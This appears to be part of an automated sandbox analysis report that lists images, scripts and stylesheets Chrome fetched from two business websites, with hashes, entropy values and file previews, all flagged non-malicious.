                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                              Category:dropped
                                              Size (bytes):665
                                              Entropy (8bit):7.42832670119013
                                              Encrypted:false
                                              SSDEEP:12:6v/7OEUelyuRs56fyKgIEInu5VLJBZInmJhd/3VqQXD8GBm1:belFRs56fuIEIu5VNBZInMTICfBO
                                              MD5:07BF314AAB04047B9E9A959EE6F63DA3
                                              SHA1:17BEF6602672E2FD9956381E01356245144003E5
                                              SHA-256:55EAF62CB05DA20088DC12B39D7D254D046CB1FD61DDF3AE641F1439EFD0A5EE
                                              SHA-512:2A1D4EBC7FBA6951881FD1DDA745480B504E14E3ADAC3B27EC5CF4045DE14FF030D45DDA99DC056285C7980446BA0FC37F489B7534BE46107B21BD43CEE87BA0
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX..W..DA.=.6O...H.,E.............b.....C.1...1..EbLPI.W......H..s.z5.:..._.d.0.u.......j.x.R..._.v..R...1..ir..`.yn..R..j.h./y..l......(`..5....l.E..0......B^......F.....F....Y|p..._,p.............(3^.r.P.O......;<....z.,..yF....N..x.MS...Q.C%......D8G.+......oOk...)T..}|..e...G.....'.R..G.Z.T}7(...&..@...G....$PGYv...A.c.]d....N..'.4b...R.%..)2Yd..b.M..^@.M....^.:h.N(dP*t..RQ%.o...{.vGH..S._".@./...g.....]...?..h..E.,r.m.%."."W.6G..t...->....q\.Kc.t"^......Kj~{l..C..).y..><@|yB....=c.............!...<....IEND.B`.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (2343)
                                              Category:dropped
                                              Size (bytes):52916
                                              Entropy (8bit):5.51283890397623
                                              Encrypted:false
                                              SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                              MD5:575B5480531DA4D14E7453E2016FE0BC
                                              SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                              SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                              SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                              Malicious:false
                                              Reputation:low
                                              Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3968
                                              Entropy (8bit):7.930577948764692
                                              Encrypted:false
                                              SSDEEP:96:XGvZ3UIRVbyd4TngSPyLZ4yr6GF/cbhwp6+q7:WvZ3UIH+d4UEy99pGwE+q7
                                              MD5:35AB5D2133D9B21081D15027168AB1EF
                                              SHA1:25B3938E1F825E9994D3DD0AF52230B66512AE40
                                              SHA-256:983BF1541D9E1F8A6940C44C6F6120001470DD36E666E1ABDC0A2AE8CBF5A659
                                              SHA-512:A4D896E8AD01FBD5B2DB5AC098F07E73C3930452F637C700589E8222391E55EFCDEE4D7F43BF7304727BE19302C4890029B8046FFD4B202E3895B2386131DBAB
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/web-maintenance.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE...OI.k_..........4*m5,oSI.h[./.....8.rQM.OJ.2%k...-+lWJ..x.u.3)qLE.YN.5..j^.RL.PK.:'r:0|WC.'.....01s4..GN....2)aRE.IF}<%hDB._S.cX....t.7*y.Z.@.....)#Z...GN.............(..<}^E.!(p...QF..].|p......%(f40g.v.*.....{p.%0yFE.G$u...:..;x.0Xt.}.6..:..5....@2y.^..q..]l....O^..h....(Q....,..cZ.&B........z.a.G*h...jI.TKt6....B{....F...Ba....%.8)I..2`OVH.vm.W4vg...W....Y{.tgp.oS.57........r.......#..%...D...a...3.....[.....i...[....IDATh...S.....V.R.A.&)I..1i.......Y.-,m......8 .#....WP......wn..#.......M...sn..].p....k......?J(..~wWC.......z...v..0.d..?-......n%..z..a..}..[_...W`.\......._..............p....~..=..!...,..'.'#.`../.i...'..,-.....%4.1..H.v%.S.f.t../-...u...G. ......aI.<(J..'.OL.QK...../I....OnaT..(.3o...$&.#c.c.E.'a..K..K0Y.)Z:Ix..%.t.C..d?L..N$r......n.F.L........S...H.fa..Nx...$~....&w%..IE..Q...d.+.?......M.n..g2....;.Opk.d..B~a...#..t.A...!5.h.F..P..<.Ov%...`$....x..u0<.......-..(9(.M..X....n.d..p....$
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):83836
                                              Entropy (8bit):7.997290805659413
                                              Encrypted:true
                                              SSDEEP:1536:ogm0K6KgxAKO1BqJTMxX0qBz6dHFqdEVCQfxV6onxIup+dOYGYbz0VqXIudPK:oNqKgx/BM+gWlOXQfzFodnz7XIudS
                                              MD5:5E9DF5C6B4B5E19BA894605F2999AC96
                                              SHA1:D82FD5225004FF56D5A0FBD748F94122D6C1C5D2
                                              SHA-256:5ED8A37A5FD400417AC7B0FE2EBB11AF28553E9D4C795A711FED95F921736B3C
                                              SHA-512:E0CBF108224847EA788E08755BB242E43CD9231B80644AEB98A5813DEED566A9EBF0F53A337E338B610D76389083F0AD0A80E4BF8B044BE265BFE02D7ABEBED4
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFFtG..WEBPVP8X..............VP8 .G..PZ...*....>.l.Q.%...v.s...bn..;i... ...5.....7yq..EE...........s...<.s.........{....z.....f.g...|...)O{.y.#......a....}N.................y...:...(.....!...9.....c...>........=....?...............e...W....V...................w...........<....q....Q.....u.......=..,...N..#>:.84U.x ...L.'.G5.....IE.(.@..G.9..lCb)...j.FXE.....o.ft.`.`.H5.....-Mn..&.9s...[5.C..i...G.J..;...s'h...k....'.) .....94..IF46......Z.d.......c>.u.%...Q...].V......!.s......C..X@.B...'.>i.[U..d.'7..._..iU.-.C.U..&.q.6&u.\..:..N.b=L3<..b...2...(...`90...Fi.6n.j.."M..=.u.Oz.rcLK...4..Y...I2o..e.!.;.F\...{7n.\..."A.{-L^..ts...X.:eR..b.2...F..8.........I....B.4&..R;)....n?r........m.` ..Dy..q.'[w..l....|.a..l~)_R...V..S.....ot.Wf.....1..,..m....F..V..Kd.._._qb.8..7......q..../|..PR....|..c...9......:.A...u.........k....7.>o.W. .?.."..MK.#..E.E....^.]..V.T.XY.H*.......*8`b..\>.%r........D$.b.:..BC^...50A.n.Cz..d.........,.l..95......"md...{...k.....F.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):13930
                                              Entropy (8bit):7.6514240437143295
                                              Encrypted:false
                                              SSDEEP:384:4YNg7C5ln/wdPuKVpMLOIvsxXn21PqY57PB:4Yy25lsuooUN2p57p
                                              MD5:C0010CB0B98F444BAC09CEE19448A862
                                              SHA1:ED60D4229E8DA4475D3E2148C01F09FD06916C1C
                                              SHA-256:EE7F66AAF252B1FD0EE6C3561A868B934566C8497E42F1D950C56DB1B0DE86BD
                                              SHA-512:4AD740253FD652D57DE6C5E38EAE381E9F7B04996463691225D524FCD03A26CDB71E7463AE086A7393764431631B188F76D9C464CB70ADCF90AEB47FB39D8449
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/57/c5ba67cb88932059cf5c124b2429f314.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):81372
                                              Entropy (8bit):7.9976389646778365
                                              Encrypted:true
                                              SSDEEP:768:6iXS0recmr/GqPgA2KyfAEFVVrFMFX93gYl+h2ZzjHf9Ft2EhMv8XylAmg2RT9hZ:1re5/G7RfiNeY/Vetlf/CccdPkzaUb
                                              MD5:684984E0053E89A423D64AE116611FA2
                                              SHA1:210BADE125DD428731E6CF539243995D6CC7DE54
                                              SHA-256:122F858A8EA09352FF302265669BCE97159DD73E2B846B966C8ADDFC04CF3AD4
                                              SHA-512:7E540E2D9A43A213663B1D524D3D912D62EF254DAB079305AC40EB855F3DFCBB3153E6A3D44E6A19B905BE03E18C9DC0D02050C9BCF61ED918920D587214621B
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/12/99cc5d257a0d7f25b4541a6275919c83.webp
                                              Preview:RIFF.=..WEBPVP8X..............VP8 `=..p....*....>.l.P.&2....3...Ig.N.g..Y.M....wJ.w.A....,d.._s...>....${.l-.......s..7..dC.Y..G}..^...z\.....c........j=J........E.c.c.......aO.o7_C.......?..*....=....t.....?....[...c......h...'...ve?......._....[..1....y.V..~O..&`pH.E..r......%.....z;.T......o..".jvY..9$...q.....mI.....n...fx.Dd0...q`at.S..D.4....I5m...H..cl7.Ck..g.....;...O.....c].{...=.o".....R^fn.$H...h|l.O.0.<.M..0.w"...5..~U..fO..+_?......fbp..jj....6..8_.o{..p..pR...B.....U..s. hD.......6h..j..d..8.......D.o.i.D).....b.=.47...(....8..7.?.z.........k..F]|..X.W.R/.}..]...l.Yk..nzG..g..Zo....o...No...h..W.p..l.;..Vy.......9..X.y.. .k?.eC6.].k..n>..D.{.........kc2.Fc.a.|.qv...I^....^.-1_..;....:.A29m...."......W.."..Q..RR.K........,..G../.O?.....D..~..).jYn..,#....7..Z....lw.r. ..^..K3"]......"~'..6.A....X..g..-N.\L...8..z].@X.?.pQ.vD.K........G>u....OX]...Z.z.xI....q...=....>./.f.P....)8...'.......^.p....8j3......@~c.F.........=p....\
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (2242)
                                              Category:downloaded
                                              Size (bytes):18696
                                              Entropy (8bit):5.169092080807774
                                              Encrypted:false
                                              SSDEEP:384:xlUbeo9hhC8qYAsLW9m1GtTjFZFmsHSyT3rin:x6bJ1LW9iGtTjFZFfSyW
                                              MD5:8C87B0A213B520D54D762D86CE0DD59B
                                              SHA1:DDF1F7B56C616E52E8FB1865EA59DD76C23B2DAE
                                              SHA-256:E5C155745DF97FD72CBEC17DDD0A944E9E21B3042BB61BF5172A50533521BB7A
                                              SHA-512:2AA50988056B4CA5A26BF174272B099143D70446DFDB74A0D408F023C00D947D45C74B7D84B5D570C96DAD0B737BB0A259D08AE3C602BA22616F15D1F3952764
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/css/swiper-bundle.min.css
                                              Preview:/**. * Swiper 8.2.2. * Most modern mobile touch slider and framework with hardware accelerated transitions. * https://swiperjs.com. *. * Copyright 2014-2022 Vladimir Kharlampidi. *. * Released under the MIT License. *. * Released on: June 1, 2022. */.@font-face {. font-family: swiper-icons;. src: url('data:application/font-woff;charset=utf-8;base64, d09GRgABAAAAAAZgABAAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABGRlRNAAAGRAAAABoAAAAci6qHkUdERUYAAAWgAAAAIwAAACQAYABXR1BPUwAABhQAAAAuAAAANuAY7+xHU1VCAAAFxAAAAFAAAABm2fPczU9TLzIAAAHcAAAASgAAAGBP9V5RY21hcAAAAkQAAACIAAABYt6F0cBjdnQgAAACzAAAAAQAAAAEABEBRGdhc3AAAAWYAAAACAAAAAj//wADZ2x5ZgAAAywAAADMAAAD2MHtryVoZWFkAAABbAAAADAAAAA2E2+eoWhoZWEAAAGcAAAAHwAAACQC9gDzaG10eAAAAigAAAAZAAAArgJkABFsb2NhAAAC0AAAAFoAAABaFQAUGG1heHAAAAG8AAAAHwAAACAAcABAbmFtZQAAA/gAAAE5AAACXvFdBwlwb3N0AAAFNAAAAGIAAACE5s74hXjaY2BkYGAAYpf5Hu/j+W2+MnAzMYDAzaX6QjD6/4//Bxj5GA8AuRwMYGkAPywL13jaY2BkYGA88P8Agx4j+/8fQDYfA1AEBWgDAIB2BOoAeNpjYGRgYNBh4GdgYgABEMnIABJzYNADCQAACWgAsQB42mNgYf
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):6814
                                              Entropy (8bit):7.365429319600115
                                              Encrypted:false
                                              SSDEEP:192:YW/wgI2YR8hF9UFLON62rAWjoN4tnedYg:YW/w3RYF9UFLOMNpawb
                                              MD5:126D34B809BB5841AAE76899DFBF37F1
                                              SHA1:C62515CFA8738055C349774D6819E97B03828CC4
                                              SHA-256:10994C88D58D175E1DB374230FE8C187DD292A73259EC568E4F822C030768D5E
                                              SHA-512:D8C78498ABFE9DE467E285E8966DFC225E74873CD264C7D80D573E67EB26746FBFA60852F7FD445493617C7695A48AC33F7CB56EF3F4B40E3349B3FAFDAF7616
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/e_brochure.png
                                              Preview:.PNG........IHDR..............x......sBIT....|.d.....pHYs..........+......tEXtSoftware.www.inkscape.org..<.....IDATx...{..ua...s.{...*.D.Q...RjBlI2.8:...L..`.U..Nm.L4......Y....8c.i.s.&k...h ......v.Y.=..s.<.C~.e.......>...OG..qf?.....UH..zjb..|.c@<.......>..=......O..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....h*...rQ..L.={>.....].n.}...;..}.C..=7...c........>..B...@.B..m.p..O.G'..... g..`......@..........@....q.1.=".,...g.`.{D.....O3......"...4......!...X.G......o...#.H...........&..b58.=".d...H-.... I..(N...#.H.....a.{D.I..@1".... ...(B...#.H...:/.....D'..NKp.{D.Q.........@4.....G.....:'......N.........Z%....x.{D....@'t`.{D....@.:4.=".... k.....@...........1...R...#.h....S......N..Y)p.{D.c%..l.<.="....@...SD.c!.....c..F&.....%..F"..d......M..I2.}...E...1.....L..I1.C...D...0.#...M..I0.c#.....3.c'.8!..De..#.X....1....,I..Q.....K...3.....C...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):41254
                                              Entropy (8bit):7.99292270454034
                                              Encrypted:true
                                              SSDEEP:768:IBXoy6MiVp0IjKepV72vFMnvAtwvQsC773gAu0a7vtl+zUxMyzq7D7wTr4UgHPgw:I4yxiwIjK4V25+oTs0ctYzUxMZ8UHoRu
                                              MD5:130689B88652C1A5ACC3198A51D02575
                                              SHA1:6062DE962A3FFBDD53CA1BAD27534A3E31D26C24
                                              SHA-256:0220EE73D2FA6CC7E5B89040A7014B24BEE25001F1A29348BCB6A8F26E9F2EFF
                                              SHA-512:564E62DDA8F9D28CDFD159C136DA243903BCA15B2C629B7786ECF978A40757A137B93801B8E102ECACCCD9209239BCE6AA977D2422C530D7D3DDB4A7FA343588
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/33/278721d8625e4718b5b85a64722cc99d.webp
                                              Preview:RIFF....WEBPVP8X..............VP8 ....0....*....>.r.S.&..#tiy...gn.]..r.........x....E...9..g.?..O...(W.~....}|s...4......a..}?.0yn.X.E...!........{N..^N..._.~..x.?."....<...o....p{..7......_.t....G.>........_.g...qm.....ix5.wIXa..k.,..~.......f...TV.r..O..S]..7.]..o.]@)......!.q....xw.T..9f3.a..d....W..g......S..\.....ng.7#.....AN....Ae|....o.Y......%d.<...............O./g.....l.?.....q+s..c}:.q.......R.Yv....5z.x.%..~..@!u.*+Z.n.....{.Y........2......s......k..=..6...O.J.B.....TV..^..Q..,.J.%...y.....{8.l..&NH.Y.z..:.?..Bz...v.<.x.}zi.>.0.I$.......y..i...C.}...+..b.J]W:..".D.......[qB....o..-.zdL.l.......{..A.S.........U......#,.c.....-.kC..F.3!..!}h.#n.}.].@.}.S.RZ..f......&.7.y....7o?.......,%..{...z.C..}).}..s.....Ek.XKxNv.....W..n..x..Y...j#...II....kR.^..*\..l0W.M/W'.E.....C..%..T........Y...}=..r=...S...../....5(5r..B.-W..hI.X.....j....z.... ...N8..D..C\...%..J\c.(..k.Sx...-.3.....m6TX.b1.dE.5....'.q....s..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (65240)
                                              Category:dropped
                                              Size (bytes):70983
                                              Entropy (8bit):5.327801775978095
                                              Encrypted:false
                                              SSDEEP:1536:1NBwKyDBpQvvtM9eqZ08dJjhBhWDs06YPewGanrY:BwNsCC8zjhBhLLYPepEs
                                              MD5:A82082C20307C018D25EA8B433311D92
                                              SHA1:1EA141B4736B1D17A8B7A695434113AEBFA8F15F
                                              SHA-256:06F66C7BEB4164979A2BC183462DBBB4A148D374D6ACA4DC0B0548D8AEAE8387
                                              SHA-512:82C108B7370D916C5FC478EBE0168464077D62E456623C678FB73FCAE91C674FE759E8546F94E324DCB2BF5029094D83147FEA830FACB456473CE2A7A109C8B9
                                              Malicious:false
                                              Reputation:low
                                              Preview:/*!. * GSAP 3.11.2. * https://greensock.com. * . * @license Copyright 2022, GreenSock. All rights reserved.. * Subject to the terms at https://greensock.com/standard-license or for Club GreenSock members, the agreement issued with that membership.. * @author: Jack Doyle, jack@greensock.com. */..!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports):"function"==typeof define&&define.amd?define(["exports"],e):e((t=t||self).window=t.window||{})}(this,function(e){"use strict";function _inheritsLoose(t,e){t.prototype=Object.create(e.prototype),(t.prototype.constructor=t).__proto__=e}function _assertThisInitialized(t){if(void 0===t)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return t}function r(t){return"string"==typeof t}function s(t){return"function"==typeof t}function t(t){return"number"==typeof t}function u(t){return void 0===t}function v(t){return"object"==typeof t}function w(t){return!1!==t}function x(){return"undefined"
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text
                                              Category:downloaded
                                              Size (bytes):12522
                                              Entropy (8bit):5.408736871661724
                                              Encrypted:false
                                              SSDEEP:192:SEitJ3PDcwXEDgJ3Wic9wE8HJ31Rc+pElqJ3M4cb6EGZJ3T/c0TEH8J36uchD:dmIgAC4YQewQi
                                              MD5:A4D52FB9FEEA8E56EDE88CAAB858E297
                                              SHA1:C7BCD3C1C2A6AE575F55027A37DB603964015EF9
                                              SHA-256:D966DD8DF1939E0AE4F6CCE5E4BF3B8549F25DF507982D35614B0F0AAD9A0C1C
                                              SHA-512:E91FE1E684B0A59DD990DABFADA5F20C701FC69FF85C555E026341E1D05E3B4A2D94A71964870A89B8C8BA57234A3C37E76ECE486104106068129BFB9E326863
                                              Malicious:false
                                              Reputation:low
                                              URL:https://fonts.googleapis.com/css2?family=Manrope:wght@300;400;500;600;700;800&display=swap
                                              Preview:/* cyrillic-ext */.@font-face {. font-family: 'Manrope';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/manrope/v15/xn7gYHE41ni1AdIRggqxSuXd.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Manrope';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/manrope/v15/xn7gYHE41ni1AdIRggOxSuXd.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek */.@font-face {. font-family: 'Manrope';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/manrope/v15/xn7gYHE41ni1AdIRggSxSuXd.woff2) format('woff2');. unicode-range: U+0370-0377, U+037A-037F, U+0384-038A, U+038C, U+038E-03A1, U+03A3-03FF;.}./* vietnamese */.@font-face {. font-family: 'Manrope';. font-style: normal;. font-we
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2000x1500, Scaling: [none]x[none], YUV color, decoders should clamp
                                              Category:dropped
                                              Size (bytes):179168
                                              Entropy (8bit):7.998358964532671
                                              Encrypted:true
                                              SSDEEP:3072:51uNcRT2QHwOqS/N3d33v0/KLl7e9SLl6w2AbWxnwQXcl9lvJh+/tXlTgD:51dXN3d3/Mr9SLpbWhwXl+ZlA
                                              MD5:08779BD2B16D7DF0E041D2D76A0169BB
                                              SHA1:A6682628A59E03FCE85F6DAD018152C678BC6700
                                              SHA-256:2D99DCE3B5F2B01CDB172B314586ED672A00E21589DF6FA992B557585851BA88
                                              SHA-512:55C9B4AA7EC88809BE62C7F3A84EFFB3009193F640C3206CCF0B80D40FB54DF586224BB9EE318AE8533C19ECC6666ABD0EED3346AA04693B8D2E836CBA297AA9
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF...WEBPVP8 ....V...*....>Q&.F..!."2.....gn.{C4...wl.T.....^y_.........a....]..../..:..._.O.['......?......y.zq.....;.|..._.O.y.r...r..~B|'..3.e...o..f...o}..G.E................|7...{.......>._..{z..z.z..b............}..V.._...........l..~..o...?................?....q.g.......W.......?...._.'...?,~E.,...3...7....._......[........_.............../......o........k.#.3.G./...w..........'...................?...}<.........?.?............O...?..........?-~...U..Vg.q.U...r..ft...j.....P..S..c....=...$e.t.y#1..........S.c....bAXau.(...J......T_....aQ~L*/.E.0..&......=\..A.;+...C).),4'S5>.c.bSG. ...)Yda..W.:.m /......G..xv..(....h.]4...e..."2..F[....9..."2..F[...c..lq.r.Z...6$98.@.5.xB.B..V..a.....t.=.GX..E... ..uY....~.....p...~vY.lr#)...k>p.F[...c..lr#-.De.....P.d.._.X..A..U..c..\S.C!..1N..h.!.#c)dgz.#o...[.B..7.. ..HB.z.......&...}..@!r.......R.7.@..H..... .8.....P....fY."2....7..n.0P.$..9..A.....1..pUE.Y`..c...y\f;~.`%...f.&.....*/.E.V&..T_....aQ~L
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):14496
                                              Entropy (8bit):7.9333716100688605
                                              Encrypted:false
                                              SSDEEP:384:K0wDuo+ixBvN7E+d58kpzLd70SSwiA/PxrIu:KE5ixBy+fXd70xo6u
                                              MD5:74470F10C999F7A08F73DB1053314461
                                              SHA1:EE5C68F3ABEF255813206F19769AD5C0B7DDC25C
                                              SHA-256:A6F841EC62471313188A79C5EFCAA6FE6D7399CC234E6C62BF362BB53DF1B26D
                                              SHA-512:41ADCE8D09C14FF99A5D92D3BB9F8D178CEA853FBFD2666D67364DC7C2345915BB54965F740B5F3D063ADC83B96A7CB128AD56B1103703F962312CAB122228AD
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):6997
                                              Entropy (8bit):7.2831547805722945
                                              Encrypted:false
                                              SSDEEP:192:ovCSQ5h+CYqza8vU6UvlyT77VNLynJQd9zj3Z1Rcy:RyCYqzaiU/9OIJQd9v3Z1Rn
                                              MD5:2D9D28AD33A04417C99E24163245A3BD
                                              SHA1:ED1A14F301240C32509A6688458BDA227C9C671E
                                              SHA-256:C2D9BF545621DF9834158CBAA6289BC43F734F5877EA299EEF81E81C18FB31EF
                                              SHA-512:F70BCFCB4C28B421698A1FC8CDC405B82291FCF841B13FAC1ED0A948B6D987FDB0BE9C9E9AB3D69E282957CFA92652D367039BE010E31DB0082FA4E226B3949D
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR..............x......sBIT....|.d.....pHYs..........+......tEXtSoftware.www.inkscape.org..<.....IDATx...k..w}....vvwfvw..]{....qPR*.I......m...-.J.D.*B(*.D[..*...Q......U!..A..1........._X....uf........3g.....K..;3;.....}...."..+..s&VN.=.x[Dq[......~..X..8.;..../...O......>3P......(.....m......(~5"./......ED..GcG|..g~...O..}V.y...dC._.V.T...,..=W>v.L.'.y._.^.T......=....'............Wm6..........e..&..Ub.zC.@..>.U...*1..&.......:..J.@...hIk._.T.T..........W...Ub.Z#..f.......j*"v..h....tz.....Ub.j'.`Bz3.U]..*1..........>.@......0..~U...J......A.~U...J......0...J.T.......)F.j..P%.`$.@z.F.j..P%.."...R.~U..... ....!k.T........_..... ......1......'.....I.`c...$..-.?..`|b......0..5b....t......1@...:..7D...........h.G.K..:..@..O..Q..V.....f..:D..8..!..=b.....a.;J.t.............#.h..`..~...n...H..eF...@...&L..)F. .@?..&@..aF...@...6I....Co.m.?.2.QD.n.<L....mQ.l.h.\......T.....#....(.?.Q...P..0\..B..zq..m.(t.T...{.2..._.p.....CO......._?........E.{.6
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):14025
                                              Entropy (8bit):7.658695077271021
                                              Encrypted:false
